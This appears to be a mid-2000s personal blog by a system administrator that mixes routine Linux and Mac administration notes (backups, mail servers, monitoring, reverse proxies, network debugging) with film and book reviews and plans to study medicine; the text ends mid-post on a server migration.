Then I came across this blog about email newsletters. I thought to myself, I do get a shitload of newsletters to my email account, which I just read and trash. Do I want to add more crap? I think email is becoming more and more useless for such things. I end up wasting alot of time reading email. Then I remembered that Bloglines lets you create random email addresses to use for subscribing to newsletters and such. It displays them just like the blog subscriptions.

This seems a more natural way of dealing with email newsletters, and I think I'll convert all of mine to this.

Interesting Exchange reverse-engineering project. Wonder if they will get DMCA'd.

I'm reading this book about medical specialties. I thought this description of an anesthesiologist was interesting:

From beginning to end, the practice of anesthesiology for each patient is similar to flying an airplane. As captain, the anesthesiologist first conducts a complete preoperative history and physical examination. Induction of anesthesia, using powerful drugs like propofol, represents the "take-off" into the flight of the procedure. This part is more than just pushing medications -- anesthesiologists have to set up the appropriate monitoring equipment and then intubate the patient. Once the patient is fully anesthetized, paralyzed, and breathing by a ventilator, maintenance has been achieved. Like a pilot, the anesthesiologist keeps careful watch over the patient, always adjusting physiologic parameters with pharmacologic agents as the case proceeds. Any operating room crises ("wind shear") require rapid interventions and quick thinking. The captain then lands the "anesthesia plane" by reversing neuromuscular paralysis, stopping anesthesia, and safely extubating the patient.

I have been through this "flight" two times in my life in the emergency room. It's strange, but both times even though I had only exchanged a few words with the anesthesiologist, this person stuck in my mind. They were both very caring and it almost made me feel nervous how much they cared. I realize now that their job requires this, as one wrong dosage and the patient will die.

I found it amazing how much control they had. I remember one telling me just before I was put out, "Ok, here comes the happy medicine." Then BAM! Immediately, before I could even laugh, I was out cold. What seemed like a few seconds later I was up in the recovery room. I was just fascinated at how powerful anesthesia could be. They are literally becoming a pilot of your body, and the above quote explains it well. It's an eerie situation. Think about it, you are so paralyzed that your body cannot even breathe, and you require a machine to do it for you. That's alot of trust you are putting into the anesthesiologist. I remember reading about one doctor that went down into the wrong pipe when intubating. He didn't realize it until the patient was already dead.

Here is a very interesting story about how someone caught identity thieves.

I've been meaning to learn Applescript. It seems great for scripting all sorts of things. However, I've never got around to learning this . Here's my first lame Applescript application.

I have a website (duh) that I would like to backup to my Powerbook weekly. Now the easiest thing to do would be to create a backup shell script and install this in cron. That's great for a machine on 24x7, but my laptop is not. Hmm, ok so let's use anacron. That will make sure my backup script runs. But then I thought, what if I suspend my powerbook during a backup. I wouldn't be able to know when the backup was running.

Ok, so how about bringing up a dialog before the backup starts (and ideally during the backup, but I couldn't figure this out). So began a sojourn into Applescript. I found this article describing cronning iTunes, and it's somewhat related to what I need to do. How do I display a dialog? Granted I would probably know this if I actually learned Applescript, but I found display dialog.

I brought up Script Editor and started playing with it. I'm impressed with how intuitive it is to write these scripts. It has a cool record function also, which I didn't use. I ended up with the script:

tell me
	activate
end tell

display dialog "Backup process will run in a few seconds"
   giving up after 3
do shell script "~/Backups/website/backup.sh >/dev/null"

The 'tell me' stuff was needed to bring the script to the foreground when it runs from cron. I found this by digging in this document. I had to save this as a 'Application' in Script Editor so I could run it from the command line.

I already had anacron installed, but the next issue was that it was only running root's scripts (periodic). I ended up adding a script to /etc/periodic/weekly/ with contents:

#!/bin/sh

su - virajalankar -c /path/to/backup.app

This would run my Applescript as the proper user. It's sort of a clumsy solution though. I should probably put the backup logic in backup.app rather than a separate shell script. But like I said, I don't know alot of Applescript.

The end result is this script gets run 'weekly', and brings up a dialog just before it runs. It won't do much good if I don't have an Internet connection when it runs though .

I do some consulting every now and then, and a recent project requires that I setup a Linux mail server for about 50 users.

Now this sounds like a very simple project, but I have been using CommuniGate Pro for so long that I've become unfamiliar with the current state of the art in free mail servers. I had some good experience with Postfix in the past, and I damn sure don't want to use Sendmail. I spent a few hours searching and found dozens of Postfix + SASL + Cyrus + IMAP + BLAH + MORE + WORK + THAN + NECESSARY guides. They are great and all, but honestly why does setting up an email server need to be so complicated?

Is there no free CommuniGate Pro equivalent out there? The closest thing I found was Courier, but it seems no one is using this as a complete server, and just using parts like IMAP. Maybe I'm wrong to look for an all-in-one solution. After some more research, the best combination of tools in my opinion for this project would be:

• Postfix (SMTP)
• Dovecot (IMAP/POP3)
• Mailscanner (SpamAssassin and ClamAV)
• Optional MySQL user database

Everything else just seems messy to me. For my project it doesn't really make sense to have a 'virtual' domain setup, and instead I can just use local user accounts. The drawback is, since they are hashed passwords, client login is required to be plaintext. That shouldn't be a problem when using SSL, but still bothers me. One option is to store the passwords plaintext in a MySQL database, and configure the SASL stuff to authenticate via that.

A goal is to let this customer manage users via a web interface, but I've found no such tool. I was thinking if I just use system accounts, Webmin for account maintenance should be easy enough. Or maybe just some simple python scripts.

Anyhow, I setup a wiki page with some more info.

I have decided to go back to school to study medicine. Those that know me probably think I'm going insane, and I don't blame you. Maybe I am.

Honestly medicine is something I've always wanted to get into but felt it was too late for me. I've always felt that being a doctor would be a very noble profession, and I would like to ultimately do something to help others in life. Computers are great and all, but the IT field is not very fulfilling for me. I found a pretty good site describing a Comp Sci PHD grad going back to school for medicine at age 37. He posted alot of useful information to help others. Another interesting page is this story about a man going to med school at age 52!

I am 30 now, and my dad is an ER doctor. He told me that some of his co-doctors started school at age 38 and above. In general I am finding out that age should not be a limiting factor for me. It would be great if I could use my computer science background in medicine, and I know of many fields I could get into. I have the funding necessary to go back to school, which is a huge influence on my decision.

What it would involve is me going back to school for about 2 years just taking prerequisites for the MCAT. Some of these classes I've already taken, but in no way remember, so much of it would be a refresher. The courses are college algebra, calculus, biologies (many!), chemistry 1 and 2, organic chem, physics 1 and 2, and other electives. At that point I would be ready for the MCAT, and after that would need to apply to med schools. That's probably another 6-8 years. I hear it's very difficult to get into schools, and students apply to 10-15 or so. Here is a somewhat discouraging comment on Slashdot about one person's experience.

I have decided to resign from my current job effective 5/13/05 (yes, that's Friday the 13th). I would start summer courses immediately. I've setup a wiki to help me keep track of things, and hopefully I'll be able to update by blog as things go. I don't know whether I'll succeed. Maybe I will get fed up and come back to IT, who knows. We will see!

I find the OS X startup chime annoying, especially when powering up my powerbook in a quiet room (meeting, library, etc). My boss says it sounds like Sinead O'Conner's Nothing Compares to You.

Searching on macosxhints.com led me to this app which lets you mute and control the volume of the startup chime. Ahh, much better.

I would like to backup certain items from my website (MySQL, etc) to my Powerbook on a weekly basis. Normally I could use cron but my laptop has to be on at the time for it to work properly.

I knew about anacron, and found this hint. Anacron will let me schedule backups and also takes care of running the periodic crons that come standard on OS X, which probably have never run for me in the past.

We have a Coraid device with 10 120gig drives setup as storage for our mailserver. This Saturday at about 5am the Coraid powered off, and appeared to be a problem with the power supply. I came in later in the morning to check it out.

We took apart the unit and found that it has a simple rackmount ATX power supply. The motherboard connector plugs into the Coraid backplane and 3 HD power connectors also plugin to the same board.

We had an ATX power supply tester which plugs in to the motherboard connector and has an on/off switch. We connected it to the power supply, switched it on, and it powered on. Then we connected it back to the Coraid, and the unit powered on as well. We put it back together and it seems stable.

Obviously we'd like to prevent this from recurring. Coraid support told me that they've never heard of a problem like this. They mentioned it might have been a power glitch causing the switching power supply to freeze. They asked us to check our UPS load, but it is very low and the other systems on it exhibited no problems. They claimed that it does not sound like a defective power supply.

I'm not so sure. Honestly these boxes should be built with redundant power supplies, but unfortunately it seems rather cheaply made. We have to keep our eye on the unit, but we still don't know why it failed. We will probably buy another power supply just to be safe.

Here be spoilers.

This movie is about 3 hours of Nicole Kidman getting raped by 10 or so males in a town called Dogville. Dogville is supposed to be a representation of America. Grace (Kidman) is sort of an innocent fugitive which the town takes under their wing. She offers her help to do different tasks around town. Soon they start to take advantage of her more and more, and if there ever was a movie showing a 'deflowering' of an innocent girl it is this one. Eventually she becomes a slave, chained, sexually assaulted, etc. Kidman looks beautiful and acts great though, as always.

The director absolutely hates the US, and it is vividly apparent. I can understand hatred of a society, but the film borders on insanity (even Ebert thinks so). If it were not for the ending, I would have been very disappointed with the film. Granted there are some evil people in this world, but they are in every country just as much as they are in America. The ending can only be described as revenge. Grace turns into the person she most desperately does not want to become. Giving orders to kill a mother and her children, Grace says "Make the mother watch and tell her you will stop killing the rest of her children if she doesn't cry." Of course she does cry. But it is revenge, and at this point you agree with her.

The movie is heavy on dialogue and philsophical ponderings. One thing I really liked is that the Kidman character originally is a merciful one, but the town changes her. She was idealistic, and believed that rapists and murderers should be forgiven for their sins. However, when those sins are done to her, though she tries, she cannot forgive. It is a double-standard, and this is where I think the true social criticism of the movie is.

I also liked the set pieces. The town is represented by chalk lines on the ground, and there are no walls. I'm not sure what the director was trying to say here, maybe that the town is so dependent on each other that they cannot survive on their own.

The movie was directed by Lars Von Trier. I remember the first movie I saw by him, called Zentropa. It was a very strange and hypnotic film. One thing I distinctly remember was the main character dying at some point and the film sort of following him through his own death sequence, and the nothingness afterwards. It was probably the most eery drowning sequence I've ever seen, and gave a good feeling of what death must be like. What's worse is the movie kept going, without its main character. I was very intrigued by it, and watched some of his other films which I loved (like Dancer in the Dark). He takes alot of risks, and he has alot of talent.

I'm reading this very good book documenting a surgeon's life through residency. It is written as the doctor is just starting out, and goes through the learning process. Here is a good quote from the first chapter:

Not everyone appreciates the attractions of surgery. When you are a medical student in the operating room for the first time, and you see the surgeon press the scalpel to someone's body and open it like fruit, you either shudder in horror or gape in awe. I gaped. It was not just the blood and guts that enthralled me. It was the idea that a mere person would have the confidence to wield that scalpel in the first place.

There is a saying about surgeons, meant as a reproof: "Sometimes wrong; never in doubt." But this seemed to me their strength. Every day, surgeons are faced with uncertainties. Information is inadequate; the science is ambiguous; one's knowledge and abilities are never perfect. Even with the simplest operation, it cannot be taken for granted that a patient will come through better off--or even alive. Standing at the table my first time, I wondered how the surgeon knew that he would do this patient good, that all the steps would go as planned, that bleeding would be controlled and infection would not take hold and organs would not be injured. He didn't, of course. But still he cut.

I've been using Nagios at work for network monitoring. I honestly wish this was still called Netsaint, as I sound like an idiot trying to pronounce Nagios.

Anyhow, it's a great system that works very well. I have it currently installed behind our firewall on a private IP. We have 2 T1s, one through Bellsouth, and one through Qwest. The default gateway for the monitoring system is through the Bellsouth T1.

I would like it to monitor connectivity through both T1s and was thinking how to do this. Our routers are actually Linux boxes, so one way I was thinking is I could use the 'check_by_ssh' plugin to execute a network connectivity test directly on each router, by doing something like a wget to www.google.com.

Another way is I setup a static route for some external website to go through the Qwest T1. Let's say I use www.cnn.com for the Qwest T1 check. Looking up their IP I could add their address block to a static route:

route add -net 64.236.16.0 netmask 255.255.240.0 gw QWEST_FW

I decided to do the route method. It's not great, since cnn could change their IPs anytime, and also just because cnn is not accessible doesn't mean the Internet connectivity is down. But we had no monitoring in place so I wanted something.

Good article on cell phone security. It's true the average person does not give a shit about security of such devices.

Checkout the Wikipedia link for what pictures were found on Paris' phone (bottom of page).

Here is an interesting article on certifications. I agree that GIAC's main benefit was its practical assignment. It was probably the most difficult part of the certification, and a shame that they will be taking it out.

As far as RHCE, the article states:

... Is this certification worthwhile? For many security people looking to understand Linux better, the answer would be a resounding yes. The RHCE seems to be the last remaining cert that makes you demonstrate your skills via a practical, hands on portion. Unlike the "paper certification" syndrome as mentioned above, the practical segment of the RHCE makes it stand out for all the right reasons. A prospective employer will know that you can actually do the hands on work once you have earned this certification.

I definitely agree with this. The RHCE has a great hands-on test that requires you to fix broken systems. It requires that you know quite a bit about Linux systems in general, even if somewhat specific to Red Hat. Many times I have had to employ the same skills in the work environment.

I had an idea of going back to school to take some courses. I have no final decision on this, but for fun I was looking at FAU's summer course listings and was trying to come up with a course schedule.

At some point I realized this course scheduling procedure, which involves checking to make sure the classes don't conflict and corequisites are taken, was rather time-consuming. I thought, why don't I just just write a program that takes as input the courses wanted, parses the listings, and devises a list of possible schedules for me that don't conflict and have all the corequisites.

So I started writing some Python. The main algorithm underwent alot of changes, and I got some good algorithm advice from Randall. Writing it out on paper helped me. The output of the program looks like this. In general it works as follows:

Let's say I have the list wanted which contains the list of courses that I want to take: (A, B, C). Next I have the full courselist: (A1, A2, A3, B1, B2, C, D1, D2). The numbers represent different times for the same course. I used a recursive function to get the various permutations, though they are not exactly permutations because they should only have one of each course.

First I strip from courselist any course that is not in wanted, which reduces the set quite a bit. From the example above, the 'D' courses would be removed. I keep a list called schedule that keeps track of the current schedule. I split the courselist into 2 lists, one containing the first element and all courses that are the same as that element. These can be thought of as parent nodes in a tree. The rest becomes the second list. So I end up with something like this:

schedule = ()
roots = (A1, A2, A3)
rest = (B1, B2, C)

Next I loop through roots, building a schedule for each. On the next recursion, it would look like:

schedule = (A1)
roots = (B1, B2)
rest = (C)

... next recusion

schedule = (A1, B1)
roots = (C)
rest = ()

The recursion should be apparent. Once either rest or roots is empty, I save the schedule. That operation does other checks such as making sure none of the classes conflict, and that the schedule contains all the needed corequisites.

Might not be useful to others, but was to me . Anyhow its good to do little programming projects every now and then or I get rusty.

Today I struggled to get Apache setup as a reverse proxy. The idea is you have a server on your intranet, say internal.server.com, that you want to be able to access from the Internet as, say external.server.com.

A reverse proxy is setup on external.server.com, and HTTP requests are proxied to the internal server. This allows you to wrap SSL over the connection, or even use separate authentication on the external server. There are issues though. The HTTP headers need to be rewritten from external.server.com to internal.server.com for requests, and vice versa for responses. This can be done with mod_rewrite. Additionally, you would need to rewrite the HTML to change any links. That's where it gets tricky.

The only thing I could find was mod_proxy_html. There was no Debian package, and I had alot of trouble trying to get this to compile with Apache 1.3. So I went ahead and grabbed the Apache 2 Debian packages, which had a pre-built mod_proxy_html. I wanted to wrap SSL on the connection, but found that the SSL configuration is not setup by default in Debian. I found this blog which had alot of useful info for setting up SSL with Apache 2 on Debian quickly.

Next I followed the tutorial to setup the reverse proxy. After much trial and error it was working mostly, but didn't rewrite meta-equiv refresh stuff properly, even with the proper mod_proxy_html options to supposedly make it do that. Ok, not a big deal. Then while testing an internal Twiki site, I saw that the html got fucked up on certain pages, with random >'s and such. Not a good sign. I was ready to ditch this solution.

Pete pointed me to CGIProxy, which I figured would give a try. This is basically a Perl CGI script that acts as a proxy. To my surprise, it was simple to setup, and just works flawlessly. I was concerned that the last update to the script was in 2002, but it looks like it is stable. I can still wrap SSL over it, or do authentication, etc. I definitely recommend this over the Apache config hackery.

The idea of 'workflow' is being thrown around alot at work. The hope is to streamline business processes.

First of all I think this whole concept of workflow is more complex than it needs to be. One of the least 'vague' packages I found was Openflow, which is based on Zope. I've been doing some reading on Zope and I think it's a very cool web framework. But this Openflow thing has shitty documentation. At least put some howto up to help people try your code. There I noticed links to the Workflow Management Coalition which has some sort of standard out. There is a TALES language specification for defining workflows. Ugh, it's all ripe for picking by commercial packages.

Then I found another package called CMSOpenflow which looks based on Openflow, but requires Zope, Plone, CMS, blah blah. It's still very cryptic to me, and why am I going to install all this stuff for something I have no understanding of.

I thought the simplest workflow, at least that I could understand, was an approval system. There is some purchase request, someone needs to look over it and approve it. Simple.

Pete over at Mako pointed me to Twiki, so I started looking for plugins. I found ApprovalPlugin, which is probably the clearest explanation of a workflow implementation I've read. So I'm reading about it and notice the author. Wow, it's an old co-worker from Z-Kat. Nice work!

I'm still not very excited about this. It's hard to be excited about business processes.

I've been playing with Zabbix for network monitoring. I had first heard about it in Linux Magazine, and the trending functionality looked interesting.

I spent about a week testing both the current stable version and the alpha. The stable one is quite old, and from an administrative standpoint is not really up to par. I since then went to the alpha version.

The system is very nice. It monitors many things on Linux boxes and provides very useful graphs of all the data. You can easily see how fast disk usage is growing, trends in CPU load, memory, etc. All the configuration is done via the web. It has a very nice graph creation procedure, and you can create custom graphs with any variables you like on the fly. It's all generated in real-time.

One drawback I see is that it is not very scalable to administer via the web. For example you have dropdowns with huge number of items in them even with just a few monitored hosts. The database (mysql) seems not very optimized for large amounts of data. There is alot of duplication of data that can be normalized. The alerting features are also sub-par when compared to Nagios. Quite a few times I've had false alarms, and I've not been able to pinpoint the issue. Nagios has nice features such as retesting services to make sure they are down before paging you. Those features are missing from Zabbix.

In general though I like Zabbix so much that I'm reluctant to ditch it. It seems to have very good potential, and I love the trending/graphing features. These are missing from Nagios. I will probably ditch it though, as it's more important to me to have a robust alerting system rather than trending performance data.

I saw a French movie this weekend called Fear and Trembling. It's an autobiography of a woman that goes to work for a corporation in Japan in 1989.

It's an amazing portrayal of Japanese office culture. I thought my office experience was bad, but after watching this, my worst experience was like heaven compared to this. It's hard to tell whether this movie was a comedy or drama, because it gets very serious at times, and some parts are ridiculously funny. It seems such offices were all about public humiliation taken to its extreme. It was all about servility, and climbing the corporate ladder. The main character goes up and down this ladder, from accountant to toilet cleaner.

I liked how it showed that not everyone in the company management was evil. You had the sumo wrestler vice president, whose main job was to verbally shit on everyone. His scenes were hilarious. There is one scene where he is yelling at a female worker for not tasting the chocolate on his desk. Then you had the president, who was the nicest person on earth and licked your wounds. Then you had the impossibly friendly co-worker, who stabs you in the back to prevent you from getting up the ladder faster than they did.

The main character narrates one scene when a boss is yelling at a female worker, describing it as a rape scene. And really, that's what it was.

What surprised me so much was that people took such abuse and did not quit. People expected the abuse and dealt with it. And it was almost like the more abuse they could take, the higher up they would get.

The ending was very thoughtful, and very strange. Essentially, the main character's salvation is to succumb to the humiliation at the highest degree. By letting the others do this to her, she gives them the satisfaction that they are all searching for in their life, to the point where, as she described it, her superior achieves orgasm.

Granted the movie does portray Japanese office culture in a very bad light, and some would argue it is unrealistic. But it was fascinating to watch nonetheless.

Today it was reinforced to me how great it is to work with open source software. The benefit is not just having the source, but being able to change it to work how you need. Here's the example.

We use Communigate Pro as a mail server we are transitioning to. Our MX record is still our old mail server, so the required mail is relayed to Communigate. Essentially the path of incoming messages is:

internet -> our.mx.server -> our.cg.server

Communigate has the ability to check SPF records, and reject messages based on that. I like SPF, and in my opinion works fairly well to reject some spam. But I can't use it in the above scenario because all mail comes from our.mx.server.

On cg, we are also running SpamAssassin. I knew SA had SPF support. I had ran it with the -D (debugging) option to see what it does in regards to SPF. The problem now is that SA considered our.mx.server as a trusted relay and skipped SPF checks.

Next it was time to look at the source. I ended up looking at PERLLIB/Mail/SpamAssassin/Plugin/SPF.pm and noticed line 165 is where the 'trusted relays' are being checked. The comment around that code was that trusted relays 'may' change the envelope from, so we can no longer trust it. I thought of just commenting out that block, but I wanted to find out some more info as to why this check was added, so I went over to SpamAssassin's download page hoping to find a CVS browser with changelogs. I didn't, but then did some googling and found the CVS updates mailing list.

That got me further, and pointed me to the SpamAssassin ViewCVS. I dug around for SPF.pm, but didn't find much comments on that code (but I didn't look too hard).

Then I thought maybe someone else has this issue and searched the devel mailing list with Gmane. The first result of the search string 'spf' pointed me to this bug which describes exactly my issue (and my original solution to comment out the block). I've come full circle, which is usually a good sign .

So why have I blogged this? Well I just thought this whole process showed the true importance of open source: being able to find information and hack what you please.

Here's an informative article on the GRUB bootloader. The tab-completion is really nice. A good read for those planning on an RHCE certification .

b2evolution has some simple blog antispam features, but it relies on a list of strings that in my opinion is not very scalable. I have been wanting to add SURBL support for awhile, and finally did. It was much easier than I expected. I had found some complicated solutions to do this in PHP, but really all I needed was URL parsing and DNS functions, both of which PHP has. All I did was modify the antispam_url() function in _functions_antispam.php with this PHP code. It also makes sure any URL domain has a proper MX record before it is accepted.

The b2evolution developers suggest making plugins for modifications, but I felt the above too simple to warrant class inheritance and all that crap. We'll see how it works. Unfortunately, SURBL is mostly for links in spam email, and I doubt their submission form would accept blog comment spam. Anyhow, I think it should help somewhat.

At work they were testing a Business Continuation Plan, which pretty much is a setup that allows the company to continue business in the event of a disaster.

For Internet access we had a simple Linksys router with a DSL line. During the test, Internet connectivity was determined to be working by going to Google and making sure the page loaded up. A tester said they couldn't get their email, so I was pulled in to figure out what was wrong.

So I started simple, doing some pings to www.google.com. Response was ok. Then went to the Google site in Firefox and Internet Explorer without issues. Then I tried telnetting to our mail server port 143 (IMAP), 25 (SMTP), 80 (HTTP), 443 (HTTPS), and 110 (POP). All gave me connections, and I was able to send simple commands without issues. But Outlook was crapping out.

Outlook was setup to use CommuniGate Pro's MAPI connector, which essentially converts everything to IMAP. I really didn't think the connector was at fault because it has worked fine in the past.

I then tried going to our webmail and didn't get anything! What was going on? I could connect via telnet, but not via any browser. Next I tried another site besides Google, such as www.cnn.com. That page didn't load up either... neither did Yahoo. I thought maybe it was network routing issue, but I could ping the destinations just fine. And even when CNN didn't load up in the browser, I could still telnet to port 80. Some screwed up proxying by Bellsouth DSL?

I thought it was a browser issue, but both IE and Firefox has same results. Why would Google load up but not other sites? Next I had to connect a real system (i.e. Unix) to this network and do some tcpdumps. I started a tcpdump, and ran a wget:

wget -O - -q http://www.cnn.com/

I got nothing back as expected, and saw in the tcpdump:

sudo tcpdump -nlp -i en1 port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on en1, link-type EN10MB (Ethernet), capture size 96 bytes
20:11:27.120888 IP 192.168.1.100.54924 > 64.236.24.28.80: S 1892952170:1892952170(0) win 65535 [mss 1460,nop,wscale 0,nop,nop,timestamp 4252212886 0]
20:11:27.187946 IP 64.236.24.28.80 > 192.168.1.100.54924: S 3676883317:3676883317(0) ack 1892952171 win 5840 [mss 1460]
20:11:27.188062 IP 192.168.1.100.54924 > 64.236.24.28.80: . ack 1 win 65535
20:11:27.188228 IP 192.168.1.100.54924 > 64.236.24.28.80: P 1:582(581) ack 1 win 65535

The 3-way handshake is there, but once the GET request is sent, nothing comes back.

Next I suspected some problem with the DSL line or the Linksys router. I looked through the web interface and saw an option for SPI, or Stateful Packet Inspection, with features to block ActiveX and other crap underneath it. I tried disabling SPI, and did my wget again. It worked!

So it boiled down to the Linksys SPI feature causing problems. It could be that it just doesn't work well for many sites. This explained why the Google page came up: because it was relatively simple HTML. Anything complex, such as CNN, would hang. I checked I was running the latest firmware on the Linksys, and I was.

Lesson learned, Linksys SPI (Stateful Packet Inspection) sucks. Don't use it.

Ugh, my gmail outgoing mail seems to taking very long deliver, up to 24 hours! wtf..

I've packaged up the IMAP calendar proxy I've been working on and made it available at my site. Please read the README.

It's nowhere near production-ready, but I figure people can try it and see how it works. I'd appreciate any feedback. I suggest making a backup of your Mozilla calendar file before using it.

The only IMAP server I tested with was CommuniGate Pro. I'm hoping others will behave the same.

Update: Some users have reported issues. Please try latest version on my site. If problems, edit ImapCalendar.py and uncomment the debug line in the init method. Send me the output, removing any passwords, and let me know what IMAP server you're using.

My Adelphia cable started doing video on demand. They had some free stuff to checkout, and I came across this video by the Chemical Brothers which I thought was pretty funny.

Over the past few days I've been writing a hack to let Sunbird access a calendar via IMAP. Basically it is a Python HTTP proxy that runs on the same host that you run Sunbird. You configure Sunbird to post to something like http://localhost:8001/Calendar and the proxy converts the request to IMAP.

It keeps track of differences in the calendar updates, and only changes the specific events via IMAP, instead of reposting the whole calendar (changes, additions, removals). This saves alot of bandwidth when using large calendars.

It's not an elegant solution as I would've liked to do it within Sunbird itself, but it let me learn about IMAP a bit. It's not quite ready for use, but if anyone is interested let me know and I will post it on my site when done. I'd like to do some caching and have it work when offline, as well as reconnect to the IMAP server if the connection is broken, etc.

I may be embarking on a programming project at work. It's basically a web based system that will interface with a database, nothing fantastic.

I would really like to do it in Python. I think the code would be easier to maintain than PHP. So I did some research on Python web programming and unfortunately have not found the right toolkit yet. I spent some time playing with CherryPy and Webware, which are servlet-type frameworks. They are nice, but not quite up to par. The documentation is really lacking in both projects. CherryPy makes things almost too simple, and Webware makes things too complex.

I don't like CherryPy because it does not seem very much suitable for production use. It's basically a web server, and I have to restart it every time I make code changes. There is a 'autoreload' module but it seems hackish. Another thing is they talk about using thread-unsafe database connectors like MySQL, but what about thread-safe ones like PostgreSQL? It's unclear how I should implement such a setup with one shared database connection across multiple threads, and the mailing list is rather quiet about database connectivity. It tells me not too many people are using it. However, some reviews are very positive about CherryPy.

Webware is very cool in that code changes are immediate. The problem is it doesn't make things very easy (for example login authentication requires way too much code).

mod_python looks interesting, but again involves alot of work for simple tasks. Python Servlet Engine does look promising, but I have to play with it more. I wish Python had more widely-used, stable, and standard web programming toolkits.

Today I closed on selling my townhouse in Fort Lauderdale. I ended up getting $40k. This is pretty good, but not great. I bought the house for $220k, kept it for 1 year, and sold for $260k. This pretty much equates to me living almost for free for the past year. Let's see the breakdown.

I stayed in an apartment for 1 year = $12k

I paid closing costs = $10k

I paid mortage = $16k

I paid other bills = let's say $5k

40 - 12 - 10 - 16 - 5 = -3

So I have a net loss of $3k in the past year. That's not exactly how it breaks down, but close to it. Obviously I would've made more money if I lived in the place longer (it was preconstruction). But the buying and selling is really just buying me time, and letting me live relatively free.

What's next? Well I'm eyeing Port Saint Lucie. There are some fairly good single family homes there running $220-240k. Those are 3 BR, around 1800 sq ft. I really see those appreciating at least 50k a year. Everywhere else is just too damn expensive, and going up. Salaries on the other hand are not.

Today we received another small form factor PC and I set it up as a firewall. We need to statically NAT an external IP to an internal IP, and after some searching I found this article explaining the procedure.

The Stalker guys have always seemed to have an ambivalence towards Linux. I've been on their mailing list for quite some time, and there are alot of attacks on Linux having an inferior threading implementation. It's almost to the point where they almost say that if Communigate crashes, it's due to buggy Linux.

Today while testing Communigate on Debian Stable with kernel 2.4.29 it crashed when I was accessing the SSL webmail interface. This thread pretty much sums up the experience and Stalker's thoughts on it. In my opinion it's a long winded way of them saying "Linux sucks at threading." Especially biting is this message.

Me and some others asked about this issue awhile back. Take a look at the response. The hatred is palpable.

Still, Communigate is a very nice system when it works. You just have to find the right distro. From what I gather, it seems the best choice we have for running Communigate is to ditch Debian and run this in Fedora Core 3.

A co-worker pointed me to this flash parody.

A few years ago I heard of a company called Bynari that was working on an Exchange replacement. In fact at my previous job it came down to either Bynari Insight Server or Communigate Pro. The reason I picked the latter was twofold. One, I had pretty good experience with using Communigate in a large ISP environment (1 million users). Two, the storage system I had was a NAS mounted via NFS, and (at the time) Cyrus IMAP (which was included with Bynari) had many caveats listed on their site about using NFS. They didn't recommend it.

These days I have no such restriction and am free to experiment. I downloaded the latest eval version. What I like about Bynari is it's primarily based on open source tools: Apache, OpenLDAP, Cyrus IMAP, Postfix, ProFTPD, Amavis, SpamAssassin, Clamav, etc. Installation was a cinch on CentOS. Their site mentions Debian support as well, but strangely I only see RPMs.

So what's good about it? The web admin is surprisingly straightforward. It's probably the first interface that that actually makes LDAP comprehensible. It was easy for me to setup domains, add users, etc. The webmail/groupware interface is also pretty nice. This is probably the most important thing I'm looking for, because I want to remove dependency on Outlook. I don't much care about the Outlook Connectors and such. Bynari's webmail is not Outlook Web Access, but does have a decent calendar interface. You can schedule meetings and see shared folders via the web client. It's lightweight and things work as expected. I did like the way Cyrus was storing messages: plain text files. Maybe Cyrus was just configured to run this way, because I remember it using Berkeley DB files in the past.

Some problems I noticed was when someone accepted or rejected a meeting, the attendee response is not visible in the original calendar entry. You can't tell whether someone accepted or rejected it. This seems a bug to me, which I've asked their support about. Also, on the recipient end, the calendar entry does not include the attendee information. So I can imagine users having questions like "Who was this meeting with again?"

I tried to migrate a 1.9gig PST file. Bynari provides a PST import tool via the web interface. But come on, 1.9gigs submitted in a web form? It crashed my Safari, and Firefox said "blow me." That import method does not seem useful to me. The way I imported data in Communigate was to install their Outlook connector, and use Outlook to import the PST. Well I tried the same with Bynari, and it pretty much crashed Outlook... sigh. Next I tried just copying from PST to the IMAP server in Outlook, which again crashed. I do have to get data from Outlook users into whatever server we use, and I want that to be done easily.

Meanwhile Scalix got some good press at LinuxWorld. It seems their new version has improved the admin interface, which was sorely lacking in the version I tested. I like Scalix's webmail interface, but I hate the complexity of the HP openmail system. It reminds me of people being hired just to administer openmail. It's a fucking mail server, it doesn't have to be this complicated! Looking at the Scalix manual all you see are chapters filled with cryptic om(insert-jobsecurity-acronym-here) commands. It's just silly to expect someone to spend time learning this crap, because when something goes wrong in such a closed system, no one will know how to fix it.

It looks like Communigate is still the choice for us.

As I mentioned, we installed a small form factor PC as a router. It's currently in test mode. One thing I noticed is sometime after bootup the blue power LED starts flashing, maybe twice a second. The system appears normal. I was concerned it might be overheating or something, so I installed lm_sensors and the SMART (ide) utilities. That took a bit to get working, mainly because Debian Stable had old versions and I ultimately had to get the latest source.

When I check sensors output, it lists quite a few warnings about voltage, 1 out of 3 fans not running, and the CPU running at 88 degrees celsius. That temperature sounds insanely high, and I'm doubting whether the output is correct. I then ran smartctl on my IDE drive and it reported temperature of 40 C. I would assume if the CPU is very hot, the HD temperature would be high as well since it sits right above the CPU in the small case.

I haven't noticed any wierd hangs or crashes. Just the flashing blue power LED. Tomorrow at work I'm going to reboot it and quickly check the BIOS temperature reports. My co-worker says it could need a BIOS flash update. It's a cool little box, but would suck if it's overheating .

Update: Rebooted the system this morning and the BIOS reported a CPU temperature of 52 C. That seems reasonable. Just before the reboot sensors said 88 C, so I know it must be wrong, or there is some awesome cooldown system going on between the time it takes me to reboot and get to the BIOS . What's also wierd is now after reboot sensors says my CPU temp is 25 C, and reports a different temperature field as 42 C. Forget sensors on this motherbord, I don't trust that output.

I looked at my Tmobile bill today and noticed it was $10 higher than normal. I have their 'get more' plan that gives 600 'whenever' minutes. I never come even close to using my cell that much.

So I'm looking at the charges, and noticed that the $10 was from 411 calls! WTF? Tmobile is charging $1.25 for each 411 call. That is such a fucking ripoff. Why can't they use the 'whenever' minutes that I never used to pay for this crap?

On the bill envelope they are encouraging people to dial 411. Their desire to squeeze as much money as possible from customers is vividly apparent.

I'm working for a client to migrate a fairly busy web server to a new network. Obviously, downtime would like to be kept to a minumum.

The main issue in such migration scenarios is DNS. You need to be sure to have low TTL values so that when you switch the IP, users go to the new site fairly quickly. Usually you would update the TTL many days in advance. TTL does not always work as expected however, and there are some DNS servers that ignore TTL in an effort to cache more.

During the time between changing DNS and remote DNS servers getting the new IP, there will be connections to both servers. One possible solution to this is implement port forwarding on the old server to redirect requests to the new one. There are different ways to do this, such as port forwarding deamons, Apache doing proxying, etc. However I found the simplest method is using Linux's iptables. This of course assumes the old server is a Linux system.

Suppose we are on the old server and the new server is 5.6.7.8. We want to redirect HTTP and HTTPS traffic. The following commands will do it:

echo 1 > /proc/sys/net/ipv4/ip_forward
